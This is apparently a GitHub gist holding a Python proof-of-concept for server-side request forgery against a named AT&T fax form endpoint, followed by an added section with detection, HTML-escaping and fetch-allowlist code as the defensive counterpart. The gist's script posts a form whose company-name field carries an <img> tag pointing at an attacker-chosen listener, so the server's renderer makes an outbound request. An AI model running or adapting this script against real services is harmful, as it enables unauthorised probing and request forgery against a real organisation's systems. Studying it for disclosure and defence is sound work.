@streghstreek
Last active April 23, 2021 12:09
ATT Exploiting SSRF
import requests

# Form endpoint the request is posted to.
url = "https://onlinefaxtwo.att.com/loa.php"
listener = input('Listener address. default port [80]: ')
headers = {'Content-type': 'application/x-www-form-urlencoded'}

# uCompanyName carries an <img> tag whose src points at the listener;
# the remaining fields are filler values for the form.
data = {
    'uCompanyName': '<img src="http://' + listener + '">',
    'uPersonAuth': 'asas',
    'uServProvider': 'asas',
    'uServAddress': 'asa',
    'uCity': 'daniel',
    'uState': 'NY',
    'uZip': '11100',
    'uPortNum': '9739018822',
    'uBTN': '1212121212',
    'cQlc': 'on',
    'cQit': 'on',
    'cQic': 'on',
    'getLOApdf': '',
}

print("Request should be sent within 10 seconds")
r = requests.post(url, data=data, headers=headers, timeout=10)
# A hit in the listener's access log shows the server fetched the injected URL.
print("Check your server LOGS :)")
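
The defensive counterpart to the request above, as an added example that is not part of the original gist. It assumes the form fields are interpolated into an HTML page that a server-side HTML-to-PDF renderer then loads, which is what would turn an injected `<img>` tag into an outbound fetch. `LOA_TEMPLATE`, `ALLOWED_ASSET_HOSTS`, the three functions and the `listener.example` host are hypothetical names and constructed sample values.

```python
import html
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Hypothetical template standing in for the generated letter (assumption).
LOA_TEMPLATE = "<html><body><h1>{uCompanyName}</h1><p>{uCity}, {uState} {uZip}</p></body></html>"
# Hypothetical allowlist: the only host the PDF renderer may load assets from.
ALLOWED_ASSET_HOSTS = {"static.example.internal"}

class _UrlAttrFinder(HTMLParser):
    """Collects (tag, url) pairs for attributes that make a renderer fetch something."""
    def __init__(self):
        super().__init__()
        self.urls = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("src", "href", "data") and value:
                self.urls.append((tag, value))

def find_injected_urls(form):
    """Detection: report form fields that carry markup with a URL attribute."""
    found = {}
    for field, value in form.items():
        finder = _UrlAttrFinder()
        finder.feed(str(value))
        finder.close()
        if finder.urls:
            found[field] = finder.urls
    return found

def render_loa_html(form):
    """Mitigation: HTML-escape every user-supplied field before templating."""
    safe = {k: html.escape(str(v), quote=True) for k, v in form.items()}
    return LOA_TEMPLATE.format(**safe)

def fetch_allowed(url):
    """Defense in depth: policy for URLs the renderer requests while rendering."""
    parts = urlsplit(url)
    return parts.scheme == "https" and (parts.hostname or "").lower() in ALLOWED_ASSET_HOSTS

# Constructed sample submission; listener.example is a placeholder host.
SAMPLE_FORM = {"uCompanyName": '<img src="http://listener.example">',
               "uCity": "daniel", "uState": "NY", "uZip": "11100"}

if __name__ == "__main__":
    print(find_injected_urls(SAMPLE_FORM))
    print(render_loa_html(SAMPLE_FORM))
    print(fetch_allowed("http://listener.example"))
```

Escaping alone removes the injected tag from the rendered page; the fetch policy covers the case where some field is later templated without escaping.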